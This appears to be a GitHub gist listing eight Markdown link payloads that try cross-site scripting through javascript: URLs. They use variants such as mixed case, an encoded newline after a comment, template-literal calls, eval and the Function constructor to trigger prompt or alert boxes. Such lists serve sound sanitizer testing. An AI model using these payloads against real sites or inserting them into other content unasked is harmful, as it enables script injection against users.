Skip to content

Instantly share code, notes, and snippets.

@guillaC
Last active April 19, 2024 20:20
Show Gist options
  • Save guillaC/8748ba3e8da51d0b1afe0d6cc3c9d4c9 to your computer and use it in GitHub Desktop.
Save guillaC/8748ba3e8da51d0b1afe0d6cc3c9d4c9 to your computer and use it in GitHub Desktop.
[test](javascript:prompt(1234))
[test](Javascript:alert(1234))
[test](javascript://www.google.com%0Aalert(1234))
[test](javascript:prompt`1234`)
[test](javascript://www.google.com%0Aprompt(1234))
[test](javascript:eval(`prompt(1234)`))
[![test](?)](javascript:prompt(1234))
[test](javascript:Function('prompt(1234)')())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment